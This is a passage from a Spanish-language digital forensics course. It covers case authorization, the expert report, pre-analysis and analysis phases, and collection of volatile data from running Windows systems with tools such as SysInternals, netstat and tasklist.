toda la documentación sobre el caso.
AUTORIZACIÓN DEL SOLICITANTE O CLIENTE DEL ANÁLIS Y LA

HOJA DE ENCARGO PROFESIONAL
La autorización dependerá del dispositivo o muestra objeto de análisis. Por ejemplo:
• Análisis de dispositivo móvil: en el que se indicará todos los datos del

propietario y/o usuario legítimo, y los datos identificativos del dispositivo
tales como: marca, número de serie y IMEI.
Si el análisis se realiza a instancia de parte y no por mandamiento judicial, deberá realizarse

la formalización de autorización de forma explícita para realizar un análisis forense de su
contenido. Indicando la fecha y hora de entrega y recogida, así como estado del mismo.
Indicando que todo proceso puede conllevar algún daño en la información del dispositivo.
• Análisis de pc o discos duros: indicando de igual forma la marca el número

de serie y en este caso debe añadirse el HASH de los diferentes dispositivos
que puedan contener evidencia digital.
La hoja de encargo con autorización del trabajo pericial: documento en el que se registra
el número de expediente del caso, el área, todos los datos del cliente o solicitante, las
condiciones económicas y en detalle el objeto y alcance de la prueba o análisis.
Además, es importante señalar de manera detallada la descripción técnica de los
dispositivos, su estado en el momento de entrada en el laboratorio, el contenido de este

y todos los detalles que el examinador y/o analista consideren de importancia para el
caso.
REALIZACIÓN DE LAS PRUEBAS SOLICITADAS

Dependiendo de la solicitud/objeto pericial que realice el cliente, debemos usar unas
herramientas u otras, igualmente que el tiempo que se empleen será distinto en cada
caso, atendiendo a la dificultad de análisis o circunstancias sobrevenidas. Cada caso
es único y debe abordarse con una estrategia y metodológica concreta. Debemos
abstenernos de abordar los casos de forma rutinaria.
Los sistemas utilizados en el proceso de análisis se deberán incorporar en el informe,
especificando las características del sistema operativo y las aplicaciones utilizadas.
ELABORACIÓN DEL INFORME

Es la exposición de todo el proceso de análisis que se ha llevado a cabo en el laboratorio,
detallando las herramientas utilizadas y los resultados.
De igual manera, como hemos dicho en temas anteriores, el informe pericial, deberá
contener:
• Los antecedentes del caso, en el que se expongan la situación anterior a la

llegada de la muestra o dispositivo al laboratorio.
• Objeto de análisis: descripción detallada de la muestra objeto de las
pruebas que se han llevado a cabo en el laboratorio y descripción del
objeto del informe.
• Las herramientas que se han utilizado en el proceso de análisis y explicar
el modo de utilización de estas, informando de las características de uso.
• Los resultados que se han detectado y la metodología usada para llegar
a esas conclusiones.
• Las conclusiones que como perito considere oportuna después de realizar
el informe y que concluye a su saber y leal entender.
• Descripción de la documentación aportada, material técnico utilizado en
el cotejo, análisis practicados y dictámenes.
SALIDA Y REGISTRO DE LAS MUESTRAS OBJETO DE ANÁLISIS

Lo que se busca con esto es proporcionar una línea temporal de los hechos sucedidos, y
dar por finalizado el proceso dentro de laboratorio.

4. Proceso del análisis
forense
4.1. Esquema general de un análisis forense
Puesto que, dentro del ámbito del forense digital, cada caso y sistema son únicos, lo que
vamos a plantear son las estrategias más comunes que podemos utilizar en la mayoría
de los escenarios con los que nos encontraremos.
Ilustración 54. Esquema general de análisis

En la imagen superior podemos ver el esquema general de análisis que se plantea. Dicho
esquema se divide en dos fases:
1. Fase de pre-análisis.
La fase de pre-análisis abarca desde el inicio del esquema hasta la verificación de firmas
de archivo, mientras que la fase de análisis abarca desde la búsqueda de keywords y
archivos de interés hasta la finalización.
Durante la fase de pre-análisis, lo que buscamos es preparar la información contenida

en la evidencia o en las evidencias para realizar, posteriormente, su estudio.
Los pasos que daremos durante la fase de pre-análisis son:

1. Recuperación de archivos eliminados.
2. Búsqueda de archivos y volúmenes cifrados y su descifrado, si es posible.
3. Descomprimir archivos comprimidos y archivos empaquetados.
4. Búsqueda de máquinas virtuales que pudiera contener la evidencia.
5. Cálculo del hash de todos los archivos para un posterior filtrado.
6. Verificación de las firmas de los archivos y su extensión.
2. Fase de análisis.
Durante la fase de análisis se realizan las operaciones necesarias para dar respuesta a
las preguntas que se nos plantean y que serán específicas del caso concreto.
Los pasos que daremos durante la fase de análisis son:
1. Búsqueda de palabras clave y archivos de interés.
2. Análisis del sistema operativo.
3. Análisis de las comunicaciones como el tráfico de red, los correos electrónicos, la
navegación web, etc.
4. El análisis de los archivos relevantes.
4.2. Fase de pre – análisis

Como ya hemos mencionado, en la fase de pre-análisis se realiza una preparación de
las evidencias que, posteriormente, va a ser estudiada de manera más exhaustiva. Esta
primera fase se puede realizar de forma casi automática en todos los casos que nos
encontremos, pues en casi todos ellos va a ser necesario realizar estos pasos previos al
estudio. La mayoría de las herramientas forenses (como Encase, FTK o Autopsy) disponen
de plugins o componentes para automatizar gran parte de las tareas que se realizan
durante esta fase.

RECUPERACIÓN DE ARCHIVOS ELIMINADOS
Como ya sabemos, cuando se elimina un archivo, todavía es posible la recuperación de
la información, siempre y cuando no se haya sobrescrito o, si se trata de un dispositivo
SSD, no hayan sido eliminados físicamente.
Primeramente, realizaremos una recuperación «básica», utilizando programas como
FTK Imager o herramientas como Autopsy, que muestran los archivos marcados como
borrados en el índice del sistema de ficheros. De esta forma podremos recuperar toda
la información: tanto el archivo como los datos asociados al mismo y gestionados por el
sistema de ficheros.
Una vez realizada la recuperación anterior, procederemos con una recuperación en
bruto de archivos borrados mediante programas como Photorec, R-Studio o Recuva, los
cuales realizan una búsqueda, sobre todo, el espacio del dispositivo de almacenamiento
buscando cabeceras de archivos eliminados.
Ilustración 55. Interfaz de Photorec en consola de comandos. Obtenida de cgsecurity.org.
El inconveniente de las recuperaciones en bruto es que únicamente somos capaces

de recuperar los archivos, no los datos asociados al él; por lo que perderemos (salvo
que esta información se encuentre en los metadatos del archivo) información tan
valiosa como las fechas de creación, la modificación y el último acceso o quién es el
usuario propietario del archivo. Esta información es especialmente relevante cuando
analizamos dispositivos utilizados por varias personas, ya que nos permiten asociar un
archivo a su usuario (del sistema) propietario.
BÚSQUEDA DE ARCHIVOS Y VOLÚMENES CIFRADOS

Cada vez más nos encontramos con archivos y/o volúmenes cifrados cuando estamos
realizando un análisis forense. Este tipo de artefactos suele ser de gran interés, ya que,

si un usuario se ha tomado la molestia de cifrar un documento, es muy probable que
contenga información de interés.
Ilustración 56. Interfaz de Passware Encryption Analyzer. https://www.passware.com/.
Para la búsqueda de archivos y volúmenes cifrados, podemos hacer uso de programas

como Passware Encryption Analyzer o Encrypted Disk Detector de Magnet Forensics que
realizan un escaneo sobre la evidencia en busca de archivos y volúmenes cifrados, aunque
muchas de las herramientas de análisis forense ya incluyen plugins o complementos que
realizan esta tarea.
La búsqueda de elementos cifrados la realizamos en esta fase para poder intentar cuanto
antes descifrar dicha información. Aun así, hay que tener en cuenta que no siempre es
posible descifrar la información, sobre todo, si utiliza un sistema de cifrado o contraseña
robustos. En estos casos, cuando no sea posible descifrar la información, debemos
documentar este extremo.
DESCOMPRIMIR ARCHIVOS
Descomprimir archivos y/o extraer archivos embebidos en otros nos permite analizar estos
archivos comprimidos o embebidos y poder aplicar sobre ellos búsquedas o filtrados.
Algunos tipos de archivos sobre los que vamos a trabajar son: archivos.ZIP,.RAR y otros
tipos de archivos comprimidos, así como archivos ofimáticos como.DOC,.DOCX,.PPT,.PPTX,
etc.
Además de los archivos comprimidos, un escenario en el que la extracción de archivos
embebidos es muy interesante es en la búsqueda de imágenes.

Ilustración 57. Representación esquemática de un archivo ofimático con elementos embebidos.
Si estamos realizando la búsqueda de una imagen y esta imagen ha sido incluida en

un documento ofimático, no la localizaremos si no hemos extraído antes los archivos
embebidos. Con respecto a los archivos ofimáticos, los archivos de las últimas versiones
de Microsoft Office (DOCX, XLSX, PPTX, etc.), son en realidad archivos comprimidos en ZIP
que incorporan todos los elementos embebidos en el documento.
BÚSQUEDA DE MÁQUINAS VIRTUALES

Para identificar las máquinas virtuales que pudieran existir en el equipo, lo ideal es
comenzar buscando las aplicaciones instaladas en él que proporcionen soporte de
virtualización. Si encontramos algún tipo de software de virtualización, es lógico pensar
que en dicho equipo puede haber máquinas virtuales gestionadas por ese software.
Analizando los registros de las herramientas de virtualización que encontremos, podremos
localizar la ubicación por defecto de las máquinas virtuales y de los discos duros de estas.
Otra forma de localizar máquinas virtuales es por los discos duros virtuales de estas. Los
formatos más comunes de discos duros de máquinas virtuales son:
• VDI (VirtualBox Disk Image): formato de disco duro virtual utilizado por la
aplicación Virtual Box.
• VMDK (Virtual Machine Disk): formato de disco duro virtual utilizado por las
herramientas de VMWare.
• VHD o VHDX (Virtual Hard Disk): formatos de disco duro virtual utilizados por
Windows y por el entorno de virtualización Hyper-V.
• HDD (Parallels Hard Disk): formato de disco duro virtual utilizado por la
herramienta Parallels.

• QED y QCOW (QEMU enhanced Disk y QEMU Copy-On-Write): formatos de
disco duro virtual utilizados por el software QEMU.
Para localizar estos discos duros virtuales, se puede realizar una búsqueda por extensiones
de archivo o una búsqueda por las firmas de los archivos.
HASH A LOS ARCHIVOS

Realizar un hash a los archivos de la evidencia nos da la posibilidad de utilizar su hash
para filtrarlos como «buenos» o «sospechosos».
Esto nos permite utilizar bases de datos de hashes de archivos conocidos (archivos de
los programas más típicos como Windows, Office, Adobe PDF, Adobe Photoshop, etc.)
para limitar el número de archivos a analizar dentro de una evidencia.
De igual forma existen bases de datos de archivos maliciosos (los antivirus también son
una buena opción en estos casos) o imágenes con contenido ilegal (pornografía infantil,
principalmente) que podemos utilizar para encontrar este tipo de archivos.
La National Software Reference Library (NSRL) es un buen ejemplo de este tipo de bases
de datos. Esta gran base de datos contiene, aproximadamente, el hash de 280 millones
de archivos pertenecientes a programas de venta al público que podremos utilizar para
descartar archivos lícitos.
Además de utilizar estas bases de datos públicas, el realizar el hash a los archivos de la
evidencia nos permite también localizar archivos que estamos buscando, por ejemplo,
en casos de robo de información, ayudándonos a encontrar en qué evidencias se han
copiado los archivos sustraídos.
Ilustración 58. Conjunto total de archivos.
Una cosa que debemos tener muy en cuenta es el algoritmo hash utilizado, puesto
que, si estamos realizando una comparativa entre algoritmos hash diferentes, nos será
imposible encontrar concordancia. Un ejemplo sería el tener en nuestra base de datos de
hashes, los hashes MD5 de archivos de interés e intentar compararlos con hashes SHA1.

HASH BORROSO
El filtrado o la búsqueda de archivos por hash es un procedimiento muy útil para localizar
archivos, sin embargo, los algoritmos de hash son muy sensibles a cualquier cambio en
el contenido por lo que, si los archivos que estamos buscando se han alterado (aunque
sea mínimamente), no los vamos a encontrar.
En estos casos es cuando se suele utilizar lo que se denomina como hash borroso o fuzzy
hashing.
El hash borroso se utiliza cuando lo que estamos buscando son archivos similares.
Principalmente, para la búsqueda de archivos de imagen, código fuente y muestras de
malware.
A grandes rasgos, este tipo de algoritmos lo que hacen es dividir el archivo en pequeños
trozos y calcular el hash de cada uno de ellos, estimando así la similitud entre las muestras.
De esta forma podemos conocer el porcentaje de similitud entre ambas.
Ilustración 59. Ejemplo de dos imágenes similares. Github. https://github.com/Tom64b/dHash.
Para la realización de hashes borrosos, existen distintos algoritmos que, generalmente,

encontramos implementados a modo de scripts independientes o como plugins dentro
de las herramientas forenses.
En función de lo que estemos buscando, imágenes, código, etc. será recomendable el
uso de un algoritmo u otro.

VERIFICAR FIRMAS DE ARCHIVO
Como ya hemos visto, lo que realmente indica el tipo de archivo no es su extensión, sino su
cabecera o firma de archivo, puesto que la extensión puede ser fácilmente modificada.
Para comprobar si en los archivos que vamos a analizar coincide lo que la extensión
indica con el contenido del archivo, se realiza la verificación de firmas
.
La modificación de la extensión y/o la ruta con el objetivo de ocultar el verdadero

contenido de un archivo es una técnica muy rudimentaria de ocultación de información,
pero todavía bastante utilizada; y es un signo muy claro de la intención de ocultar algo.
La mayoría de las herramientas forenses comparan la firma de los archivos con su
extensión, y muestran un aviso cuando no son coincidentes, de tal forma que podamos
analizar más en detalle el motivo de la discrepancia.
Ilustración 60. InterfazdelmóduloMismatchFileSearchdeOSForensics. https://www.osforensics.com/find-misnamed- files.html.
4.3. Fase de análisis

En la fase de análisis, realizamos las operaciones y búsquedas que nos llevarán a contestar
a las preguntas que nos plantean. Esta segunda fase es la más personalizada y varía
entre unos casos y otros.

Por ejemplo, en un caso de revelación de secretos, puede ser muy interesante el análisis de
los programas de envío de correos electrónicos instalados y las bases de datos de dichos
programas; mientras que, en un caso de falsificación de documentos, puede interesarnos
más el análisis de todo el software de retoque fotográfico que pudiera haberse utilizado
y un estudio de las impresoras y escáneres configurados en el equipo.
BÚSQUEDA DE PALABRAS CLAVE

En ocasiones nos podemos encontrar con análisis en los que es necesario obtener
documentos relacionados con determinadas palabras, por ejemplo, que tengamos
que obtener los documentos en los que se menciona a una determinada persona, un
determinado lugar, o documentos en los que se hable sobre secretos empresariales.
Para estos casos, realizaremos una búsqueda de palabras clave en las evidencias
recolectadas.
Este tipo de búsquedas es muy similar a la que podemos realizar con nuestro propio
sistema operativo, con la diferencia de que también se busca sobre los espacios libres
de la evidencia y en el interior de los archivos. Además de permitir el uso de expresiones
regulares.
Una expresión regular no es más que una secuencia de caracteres que conforma un
patrón de búsqueda de tal forma que podemos comparar el patrón con otro conjunto de
caracteres más amplio y localizar las coincidencias.
Las expresiones regulares pueden estar formadas por caracteres «normales» o por meta
caracteres que son elementos que se interpretan de manera especial.
Una expresión regular muy común es la que nos permite buscar direcciones de correo
electrónico:
/^[a-zA-Z0-9.!#$%&’*+/=?^_`{|}~-]+@[a-zA-Z0-9-]+(?:\.[a-zA-Z0-9-]+)*$/
La expresión regular anterior —que podemos encontrar o escribir de múltiples otras

formas— nos devolverá como resultado cualquier cadena de texto que coincida con una
dirección de correo electrónico.
Otra expresión regular que también suele utilizarse es la que nos permite localizar números
de tarjetas de crédito:
^(?:4[0-9]{12}(?:[0-9]{3})?|[25][1-7][0-9]{14}|6(?:011|5[0-9][0-9])[0-9]{12}|3[47][0-9] {13}|3(?:0[0-
5]|[68][0-9])[0-9]{11}|(?:2131|1800|35\d{3})\d{11})$

La expresión regular anterior nos encontrará los números de tarjetas de crédito válidos
para varias familias de tarjetas de crédito como Visa, MasterCard o American Express.
La mayoría de las herramientas forenses vienen con una serie de expresiones regulares
precargadas que podemos utilizar o sobre las que podemos añadir nuestras propias
expresiones regulares.
BÚSQUEDA DE ARCHIVOS DE INTERÉS. Además de la búsqueda de palabras

clave, también suele ser interesante buscar archivos que cumplan unas determinas
características.
Por ejemplo, archivos ofimáticos creados entre unas determinadas fechas y con un
tamaño concreto o en una ruta específica o archivos de imagen con un tamaño
comprendido entre 1MB y 100MB.
La mayoría de las herramientas nos permiten crear reglas y agruparlas dentro de un
grupo de tal forma que podamos buscar archivos que cumplan con una o con varias de
las reglas.
Además, estas reglas que nosotros definamos se comparten entre los distintos casos en
los que trabajemos, por lo que podemos crear reglas generales del tipo: programas de
encriptación, monederos de criptomonedas, directorios y/o archivos que contengan la
palabra «privado»; y utilizarlas en varios casos.
Ilustración 61. InterfazdelpluginInterestingFilesIdentifierdelasuiteAutopsy. http://sleuthkit.org/autopsy/docs/user- docs/4.17.0/interesting_files_
identifier_page.html.

Esto es especialmente interesante en casos de fugas de información (archivos que
fueron accedidos entre unas determinadas fechas) o en casos de malware en los que
queremos analizar los archivos que se descargaron o se ejecutaron en un período de
tiempo concreto.
ANÁLISIS DEL SISTEMA OPERATIVO

En este punto, el objetivo es analizar los datos registrados por el sistema operativo como
registros de eventos, cuentas de usuario, actividad reciente del usuario en el sistema, etc.
Durante el análisis del sistema operativo, tenemos que seguir una serie de pasos, durante
los cuales tenemos que intentar responder a las siguientes preguntas:
1. Nombre y versión del sistema operativo instalado, así como las actualizaciones.
a. ¿Es una versión no oficial, o hay alguna actualización que no lo sea?
2. Usuarios del sistema y sus privilegios.

a) ¿Hay algún usuario anormal?
b) ¿Hay cuentas anónimas activas?
c) ¿Alguno de los usuarios es el propietario de algún archivo sospechoso?
3. Programas instalados.
a. ¿Hay programas que permitan realizar el hecho investigado?
Ejemplo: si estamos investigando la clonación de tarjetas, ¿hay algún programa que

permita su copia?
4. Antivirus instalados y análisis de seguridad.
a. ¿Tiene instalado algún antivirus?
b. ¿Existe algún antivirus falso?
c. ¿Está infectado con algún virus el equipo? En tal caso, ¿dicho virus se
encuentra activo?
5. Análisis de los archivos de registro del sistema operativo.

a. ¿Sobre qué sucesos se guardan registros?
b. ¿Los archivos de registro han sido modificados?
6. Hardware configurado en el sistema.

c. ¿Qué hardware se encuentra configurado en el sistema?
d. ¿Qué dispositivos han sido conectados a él?
e. ¿Con el hardware configurado se ha podido realizar el incidente investigado?
(Ejemplo: clonación de tarjetas).
Con el análisis de estos apartados, tendremos una idea general de lo que se puede o
no hacer con el equipo. Además de que gracias a los archivos de registro analizados
podremos obtener información sobre las acciones realizadas sobre el equipo.
Aunque muchas de las suites forenses que utilicemos nos permitirán obtener esta

información de manera más o menos automatizada, es normal que tengamos que
recurrir a herramientas de terceros como Windows Registry Recover para el análisis del
registro de Windows o Event Log Explorer para el análisis de los eventos de un Sistema
Operativo Windows, por nombrar algunas.
Ilustración 62. Interfaz de Windows Registry Recove
ANÁLISIS DE LAS COMUNICACIONES

Durante el análisis de las comunicaciones, estudiaremos los distintos navegadores de
Internet que tenga el equipo (Chrome, Firefox, Edge, etc.), y obtendremos información
sobre los sitios web visitados, archivos descargados o cookies, entre otros.
También debemos analizar el software utilizado para el envío y la recepción de correos

electrónicos y otras aplicaciones como software P2P.
Por último, no debemos olvidar las aplicaciones de sincronización de archivos en la nube
como Google Drive, Dropbox o One Drive, de las cuales podemos obtener información
muy relevante.
Al igual que durante el análisis del sistema operativo, durante el análisis de los componentes
de red tendremos que seguir una serie de pasos e intentar responder a las siguientes
preguntas:
1. Programas Peer to Peer (P2P), FTP u otros de compartición de ficheros.

a. ¿Qué programas de este tipo tenía instalados y configurados?
b. ¿Alguno de ellos tenía una configuración «extraña»?
c. ¿Qué archivos se han compartidos o descargado?
2. Correos electrónicos y mensajería instantánea.

¿Qué programas de este tipo tenía instalados y configurados?
Listado de contactos.
¿Qué archivos han sido enviados o recibidos mediante estos programas?
Listado de mensajes de correo, mensajería y llamadas VoIP.
3. Navegadores de Internet.
a. ¿Qué programas de este tipo tenía instalados y configurados?

b. ¿Qué páginas había visitado?
c. ¿Qué páginas tenía como favoritos?
d. Listado de las contraseñas almacenadas y certificados instalados.
e. Cookies y archivos temporales de la navegación.
4. Otros programas con acceso a Internet.
a. Dropbox.
b. Google Drive.
c. One Drive.
d. Etc
Ilustración 63. Interfaz de ChromeHistoryView. https://www.nirsoft.net/utils/chrome_history_view.html.
En esta etapa debemos tener en cuenta que, cuando analicemos los correos electrónicos,
los programas de mensajería instantánea o cualquier otro programa que pueda albergar
comunicaciones privadas entre personas, debemos tener cuidado de no incurrir en un
delito contra el secreto de las comunicaciones.
ANÁLISIS DE LOS ARCHIVOS DE INTERÉS

El último punto del análisis consiste en el análisis de los archivos que hemos localizado y
que serían de interés. Por ejemplo, el análisis de bases de datos o el análisis de documentos
ofimáticos que puedan contener información relevante para la pericial solicitada.
El análisis que practiquemos sobre estos archivos dependerá mucho del caso y de las
preguntas concretas que tengamos que responder.

En función de dónde estemos desarrollando nuestra labor, es posible que este último
punto del análisis lo realicen peritos especializados en el tema. Por ejemplo, en el caso
de falsificación de las cuentas de una empresa, es muy normal que los especialistas en
forense digital localicen y recuperen los archivos de interés y que los especialistas en
contabilidad analicen dichos archivos de interés en busca de pruebas.
5. Sistemas operativos y
análisis forense
5.1. Análisis de un S.O. Windows
El tipo de información que podemos recolectar y estudiar dentro de un Sistema Operativo

Windows es mucha y muy variada por lo que nos centraremos en:
1. Recolección de la información volátil.

2. El Registro de Windows.
3. El registro de eventos.
4. La actividad reciente.
5. La papelera de reciclaje.
RECOLECCIÓN DE INFORMACIÓN VOLÁTIL
Todos los sistemas operativos manejan gran cantidad de información volátil, la cual
se pierde al apagar el equipo. Por lo tanto, únicamente vamos a poder recolectar esta
información si nos encontramos ante un equipo Windows encendido.
Una muestra de la información volátil que podemos encontrar en un Sistema Operativo

Windows que nos será de interés desde un punto de vista forense es:
• La fecha y la hora del sistema.
• Los usuarios que han iniciado sesión.
• Información sobre los archivos abiertos.
• Información de red. Procesos en ejecución
• Etc.

FECHA Y HORA DEL SISTEMA
Aunque pueda parecer obvio, uno de los primeros pasos cuando comenzamos a trabajar
sobre un equipo encendido es obtener la fecha y hora del sistema. De esta forma
podremos comprobar si se encontraba correctamente configurada o si, por el contrario,
había sido modificada.
El conocer la fecha y hora configurada en el sistema nos permitirá construir una línea
temporal fidedigna; y, de esta forma, evitar posibles manipulaciones intencionadas por
parte del usuario.
Si tenemos acceso al equipo, podemos obtener la fecha y hora del sistema desde la
consola de comandos y desde la consola de PowerShell.
Desde la consola de comandos, utilizando el comando «date /t & time/t», obtendremos la
fecha y hora local de la máquina. Por su parte, desde PowerShell utilizando el comando
«Get-Date» obtendremos la misma información.
USUARIOS QUE HAN INICIADO SESIÓN

Durante la investigación es muy importante conocer los usuarios conectados al sistema
objeto del análisis. Esto no incluye únicamente a los usuarios con acceso local, sino
también a aquellos usuarios conectados de manera remota al equipo (por ejemplo, a
través de un recurso compartido).
Para ello, las herramientas PsLoggedOn o LogonSessions, pertenecientes a las SysInternals
de Microsoft son una muy buena opción.
Se puede acceder a ellas a través del siguiente link: https://docs.microsoft.com/enus/
sysinternals/.
También podemos obtener información muy relevante utilizando los propios comandos
del Sistema Operativo o las funciones incluidas en PowerShell.
USUARIOS QUE HAN INICIADO SESIÓN: PsLoggedOn
PsLoggedOn es una herramienta que muestra tanto a los usuarios conectados

localmente como a los usuarios conectados a través de los recursos de la computadora
local o de una remota.

Ilustración 64. Ejecución del comando PsLoggedon.
USUARIOS QUE HAN INICIADO SESIÓN: LogonSessions

Enumera las sesiones actualmente activas y, si se especifica la opción -p, los procesos
que se están ejecutando en cada sesión.
Ilustración 65. Ejecución del comando logonsessions. Fuente: Microsoft.
USUARIOS QUE HAN INICIADO SESIÓN: CMD y PowerShell

También es posible obtener el listado de usuarios que han iniciado sesión en el equipo
desde PowerShell utilizando el comando «query user /server:$SERVER»

Ilustración 66. Ejecución del comando. Fuente: elaboración propia.
ARCHIVOS ABIERTOS
Conocer los archivos abiertos por los usuarios que han iniciado sesión en el equipo puede
aportar pistas muy importantes de cara a la investigación. Podemos, por ejemplo, ver los
archivos compartidos que un usuario remoto ha abierto, archivos que pueden contener
información confidencial que no debería salir de la organización.
De nuevo, una utilidad incluida en las SysInternals de Microsoft, PsFile, puede sernos de
utilidad en este caso. Además, los comandos net file y openfiles también van a aportarnos
información al respecto.
Otra opción sería ver los archivos abiertos por determinados procesos, pero eso lo
veremos más adelante.
ARCHIVOS ABIERTOS: PsFile

El comando net file muestra una lista de archivos que otros equipos han abierto en el local.
Sin embargo, trunca los nombres de las rutas largas, y no permite ver esa información
para los sistemas remotos. PsFile corrige esto y, además, permite cerrar los archivos
abiertos.
ARCHIVOS ABIERTOS: OPENFILES
El comando openfiles permite a un administrador listar o desconectar archivos y

directorios que se han abierto en un sistema.
Es necesario tener activada la opción «mantener lista de objetos» para poder ver los
archivos abiertos localmente.

INFORMACIÓN DE RED
Cuando se está investigando un incidente, las trazas de las comunicaciones de red suelen
ser una gran fuente de información. Sobre todo, en casos relacionados con infecciones
por malware o fugas de información. En estos casos, la caché de conexiones realizadas
mediante NetBIOS o las conexiones abiertas en el equipo, son los principales artefactos
que investigar.
INFORMACIÓN DE RED: INFORMACIÓN GENERAL

Antes de comenzar a obtener información sobre las conexiones establecidas, es necesario
obtener la propia configuración de los interfaces de red del equipo.
Para ello, podemos utilizar las propias herramientas del sistema, como el comando
ipconfig (ipconfig /all) o herramientas externas como PromiscDetect o Promqry que nos
permiten detectar aquellos interfaces de red en modo promíscuo.
También podemos utilizar scripts de PowerShell para obtener esta información.
Ilustración 67. Ejecución de los comandos.
INFORMACIÓN DE RED: CACHÉ NETBIOS
NetBIOS es un protocolo de red (cada vez menos utilizado, pero todavía activo) que
permite a las aplicaciones comunicarse a través de la red.
La caché de nombres de NetBIOS contiene un listado de las conexiones realizadas por

otros sistemas que utilizan este protocolo. Esta caché contiene el nombre y la dirección
IP del sistema remoto, y podemos visualizarla utilizando el comando nbtstat incluido en
el sistema operativo.

Para visualizar la caché de nombres de NetBIOS, tan solo tendremos que ejecutar el
comando con la opción «-c»:
nbtstat -c
INFORMACIÓN DE RED: CONEXIONES ABIERTAS

Cuando estamos analizando un equipo que sospechamos se encuentra infectado con
un malware, uno de los primeros puntos a analizar es el de las conexiones abiertas. Las
conexiones que dicho equipo tiene establecidas con otros sistemas (ejemplo, conexiones
con el centro de control del malware o conexiones con el sistema de keylogger remoto).
Para ello, podemos utilizar el comando netstat del propio sistema operativo y la herramienta
TCPView de las SysInternals, la cual nos mostrará las conexiones establecidas por cada
uno de los procesos en ejecución en el equipo.
Netstat es una herramienta en línea de comandos que muestra un listado con las
conexiones activas en un equipo, tanto entrantes como salientes.
Ilustración 68. Ejecución de netstat.
Esta herramienta podemos ejecutarla con distintos parámetros, cada uno de los cuales
nos mostrará una información u otra.
Por ejemplo, si añadimos la opción «-r», podemos visualizar las tablas de enrutamiento
y rutas activas, mientras que con la opción «-o» podemos obtener los puertos y las
direcciones remotas con las que se está comunicando un proceso (obtenemos su PID).
PROCESOS EN EJECUCIÓN
Los procesos que se encuentran en ejecución y la manera en que estos han sido «lanzados»
son también importantes de cara a una investigación.

Analizando los procesos en ejecución, podemos saber, por ejemplo, si se están utilizando
los recursos de la empresa para minar criptomonedas o si algún equipo está infectado
con un software malicioso.
La manera más sencilla de ver los procesos en ejecución es a través del administrador de
tareas, pero desde un punto de vista más forense; de nuevo, las SysInternals de Microsoft
nos proporcionan algunas herramientas muy útiles.
PROCESOS EN EJECUCIÓN: TASKLIST

El comando tasklist, incluido en los Sistemas Operativos Windows, es una especie de
administrador de tareas en modo consola de comandos. Esto nos permite automatizar
esta parte de la recolección de evidencia, además de otras opciones interesantes como:
• /S [sistema]: especifica el sistema remoto al que conectarse.

• /U [dominio\usuario]: especifica el contexto de usuario.
• /SVC: muestra los servicios hospedados en cada proceso.
• /FI [filtro]: permite filtrar el listado.
• /FO [formato]: permite dar formato al listado.
PROCESOS EN EJECUCIÓN: TASKLIST

Similar al comando tasklist, la utilidad pslist, incluida en las SysInternals, muestra
información básica de los procesos. Para obtener información más precisa o avanzada,
podemos utilizar algunas de sus opciones que, entre otras cosas, nos permiten ver en qué
estado se encuentran los hilos asociados a los procesos o ver el listado en forma de árbol
para apreciar a simple vista qué subprocesos se han lanzado y cuáles son los padres de
estos subprocesos.
PROCESOS EN EJECUCIÓN: PROCESS EXPLORER
Process Explorer es otra utilidad de Microsoft incluida en las SysInternals que nos
permite ver el listado de procesos en ejecución en el equipo de manera mucho más
amigable.
Con Process Explorer vamos a poder ver los procesos y subprocesos, los parámetros de
ejecución de estos, las DLL utilizas, sus «punteros» (handles) en uso, etc.

PROCESOS EN EJECUCIÓN: PROCESS MONITOR
Process Monitor es una herramienta de supervisión para Windows que muestra en tiempo
real la actividad del sistema de archivos, el registro, la red y los procesos.
Además, Process Monitor permite realizar un rápido filtrado de la información, lo que nos
permite centrarnos únicamente en el proceso sospechoso (por ejemplo, un keylogger) y
descartar el resto o analizar tan solo los archivos o las claves de registro que están siendo
accedidas y/o modificadas.
PROCESOS EN EJECUCIÓN: LISTDLL
ListDLLs es una utilidad que nos muestra las DLLs cargadas por los procesos.
Podemos utilizarla para listar todas las DLLs cargadas en todos los procesos, en un
proceso específico; o, para listar los procesos que tienen una DLL cargada en particular.
Por ejemplo, cuando sospechamos de una DLL maliciosa. ListDLL también puede mostrar
la información de la versión completa de las DLL, incluida su firma digital, y puede utilizarse
para escanear procesos en busca de DLL no firmadas.
PROCESOS EN EJECUCIÓN: VOLCADO DE PROCESOS

Aunque lo veremos más en profundidad cuando analicemos la memoria RAM, si hemos
detectado un proceso malicioso, el siguiente paso sería realizar un volcado de la memoria
de este.
Para ello podemos utilizar herramientas como:
• El propio Administrador de tareas (clic derecho sobre el

proceso y «Crear archivo de volcado»).
• pmdump (existe en versiones para Windows y Linux/
Android).
• ProcDump (incluido en las SysInternals).

EL REGISTRO DE WINDOWS
El registro de Windows es una gran base de datos jerárquica utilizado en los Sistemas
Operativos Windows con el fin de almacenar información necesaria para configurar el
sistema para los usuarios, las aplicaciones y los dispositivos de hardware.
El registro reemplaza a la mayoría de los archivos de configuración basados en texto que

se utilizaban en los antiguos Windows 3.x y MS-DOS, como Autoexec.bat y Config.sys, y
contiene información que Windows utiliza de manera recurrente, como, por ejemplo:
• Los perfiles de los usuarios.

• Las aplicaciones instaladas en el equipo.
• Los tipos de documentos que cada aplicación puede crear.
• Los elementos de hardware que hay en el sistema.
• Los puertos que se están utilizando.
El registro se estructura en forma de árbol, y contiene dos elementos básicos: claves y

valores.
Las claves del registro son similares a carpetas: además de los valores, cada clave puede
contener subclaves que, a su vez, pueden contener más subclaves; y, así, sucesivamente.
Las claves están referenciadas con una sintaxis parecida a los nombres de las rutas de
Windows, y usan barras diagonales inversas para indicar los distintos niveles jerárquicos.
Cada subclave tiene obligatoriamente un nombre: una cadena que no puede contener
barras diagonales inversas y en la que no se distingue entre mayúsculas y minúsculas.
Hay cuatro claves raíz. Si visualizamos el registro con RegEdit veremos una quinta clave
raíz: HKEY_CLASSES_ROOT. Esta clave muestra la información existente en:
• HKEY_LOCAL_MACHINE\SOFTWARE\Classes
• HKEY_CURRENT_USER\SOFTWARE\Classes) dentro del registro
de Windows y cada una de estas claves se almacena en uno o
varios archivos distintos.
Las claves son:
• HKEY_CURRENT_USER.
• HKEY_LOCAL_MACHINE.
• HKEY_USERS.
• HKEY_CURRENT_CONFIG.

El registro se almacena en una serie de archivos dentro de la estructura de carpetas del
sistema Windows.
La mayoría de estos archivos, excepto los asociados a la clave HKEY_CURRENT_USER,
están en la carpeta de configuración del sistema:
• %SystemRoot%\System32\Config.
Mientras que el archivo correspondiente a la clave HKEY_CURRENT_USER está en la carpeta

del usuario: Users\[Usuario].
Los archivos que almacenan la información de cada una de las claves raíz del registro de
